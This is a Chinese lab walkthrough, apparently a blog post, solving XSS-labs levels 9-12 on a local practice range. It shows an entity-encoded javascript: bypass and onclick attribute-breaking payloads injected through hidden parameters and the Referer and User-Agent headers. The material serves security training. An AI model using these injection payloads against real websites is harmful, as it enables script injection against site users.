XSS-labs靶场过关秘籍(level 9-12)

本文提供XSS靶场level9-12的详细过关策略,包括如何利用大小写过滤、实体编码绕过等技巧,及针对不同隐藏变量的XSS注入测试方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS-labs靶场过关秘籍(level 9-12)

level 9

进入靶场,看见输入框,使用测试xss注入代码进行过滤测试

<script" ' Oonn>

在这里插入图片描述
点击添加友情链接后发现输入框中的大写字母变成小写,存在大小写过滤
在这里插入图片描述
点击友情链接发现页面跳转后提示404错误
在这里插入图片描述
查看页面源码发现提示输入的链接不合法
在这里插入图片描述
使用符合属性href的格式和百度的URL地址进行测试

javascript:alert('http://www.baidu.com')

在这里插入图片描述
点击添加友情链接,点击链接后发现页面跳转提示403错误
在这里插入图片描述
查看页面源码发现对javascript进行过滤,使用实体编码进行绕过

java&#x73;cript:alert('http://www.baidu.com')

在这里插入图片描述
添加友情链接后点击超链接,页面提示过关
在这里插入图片描述

level 10

进入靶场,发现页面没有输入框,分析URL地址发现存在使用GET请求方式传递的参数
在这里插入图片描述
将xss测试注入代码写入GET请求方式的参数中

http://127.0.0.1/xss/level10.php?keyword=<script " ' Oonn>

在这里插入图片描述
提交请求后发现页面没有提示,查看页面源码
在这里插入图片描述
分析页面源码发现没有接收参数keyword的变量,但是有三个被隐藏的变量,向这三个变量传递参数值,测试是否存在xss注入
测试变量t_link

click" type="button" οnclick="javascript:alert(1) //闭合符合
http://127.0.0.1/xss/level10.php?t_link=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
页面没有按键出现,查看页面源码发现t_link变量没有接收参数值
在这里插入图片描述
测试变量t_history

click" type="button" οnclick="javascript:alert(1) //闭合符合
http://127.0.0.1/xss/level10.php?t_history=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
页面没有按键出现,查看页面源码发现t_history变量没有接收参数值
在这里插入图片描述
测试变量t_sort

click" type="button" οnclick="javascript:alert(1) //闭合符合
http://127.0.0.1/xss/level10.php?t_sort=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
提交请求后页面出现按钮。点击页面提示过关
在这里插入图片描述

level 11

进入靶场,发现页面没有输入框,分析URL地址发现存在使用GET请求方式传递的参数
在这里插入图片描述
将xss测试注入代码写入GET请求方式的参数中

http://127.0.0.1/xss/level11.php?keyword=<script " ' Oonn>

提交请求后页面没有提示,查看页面源码
在这里插入图片描述
在这里插入图片描述
分析页面源码发现没有接收参数keyword的变量,但是有四个被隐藏的变量,向这四个变量传递参数值,测试是否存在xss注入
测试变量t_link

click" type="button" οnclick="javascript:alert(1) //闭合符合
http://127.0.0.1/xss/level11.php?t_link=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
在这里插入图片描述

页面没有按键出现,查看页面源码发现t_link变量没有接收参数值

测试变量t_history

click" type="button" οnclick="javascript:alert(1) //闭合符合
http://127.0.0.1/xss/level11.php?t_history=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
页面没有按键出现,查看页面源码发现t_history变量没有接收参数值
在这里插入图片描述

测试变量t_sort

click" type="button" οnclick="javascript:alert(1) //闭合符合
http://127.0.0.1/xss/level11.php?t_sort=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述

页面没有按键出现,查看页面源码发现t_sort变量没有接收参数值
在这里插入图片描述
测试变量t_ref

click" type="button" οnclick="javascript:alert(1) //闭合符合
http://127.0.0.1/xss/level11.php?t_ref=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
页面没有按键出现,查看页面源码发现t_ref没有接收参数值
在这里插入图片描述
根据变量名猜测接收的值可能写在数据包中,勾选referrer选项,抓取数据包
在这里插入图片描述
在数据包中修改Referrer的值,改为xss注入代码,放包

click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
页面出现按钮,点击,页面提示过关
在这里插入图片描述

level 12

进入靶场,发现页面没有输入框,分析URL地址发现存在使用GET请求方式传递的参数
在这里插入图片描述
将xss测试注入代码写入GET请求方式的参数中

http://127.0.0.1/xss/level12.php?keyword=<script " ' Oonn>

提交请求后页面没有提示,查看页面源码,分析源码发现没有接收参数keyword的值的变量,但是其中隐藏变量t_ua接收了数据包中User-Agent的值
在这里插入图片描述
抓取数据包,修改User-Agent的值,改为xss注入代码
在这里插入图片描述
放包,页面出现按钮,点击,页面提示过关
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值